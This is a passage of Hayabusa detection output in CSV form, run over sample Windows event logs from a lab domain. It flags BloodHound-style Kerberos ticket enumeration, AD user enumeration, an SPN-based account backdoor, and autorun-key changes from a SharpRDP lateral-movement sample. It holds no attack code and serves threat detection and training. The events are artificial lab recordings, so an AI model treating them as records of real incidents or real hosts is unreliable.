Requested,User: admmig@OFFSEC.LAN : Service: DHCP01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATANIDS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PRTG-MON$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.862 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 
-2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ADFS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEBIIS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS03VULN$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket 
Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59919 : LogonID: 0x64f5bad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.334 
+09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59920 : LogonID: 0x64f5bf1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59921 : LogonID: 0x64f5c04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59993 : LogonID: 0x64f5c7f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60017 : LogonID: 
0x64f5cb1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60018 : LogonID: 0x64f5cc8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60019 : LogonID: 0x64f5cf4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ATACORE01$ : Workstation: - : IP Address: 10.23.42.30 : Port: 62476 : LogonID: 0x64f5ef5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59641 : LogonID: 
0x64f6471,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 51370 : LogonID: 0x64f64a3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59643 : LogonID: 0x64f64ca,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59644 : LogonID: 0x64f64e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59645 : LogonID: 0x64f64f3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx -2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User 
Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" -2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" -2020-07-10 07:00:14.124 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:14.124 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:14.195 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:14.195 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,12,medium,Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:28.307 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:28.307 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 
07:00:28.458 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:28.458 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:31.218 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:31.218 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:42.919 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:42.919 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:43.042 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:43.042 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\windows\system32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:01.154 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:01.154 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:01.337 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:01.337 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.899 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.899 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.900 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.900 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.902 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:03.902 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 07:02:42.085 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx -2020-07-10 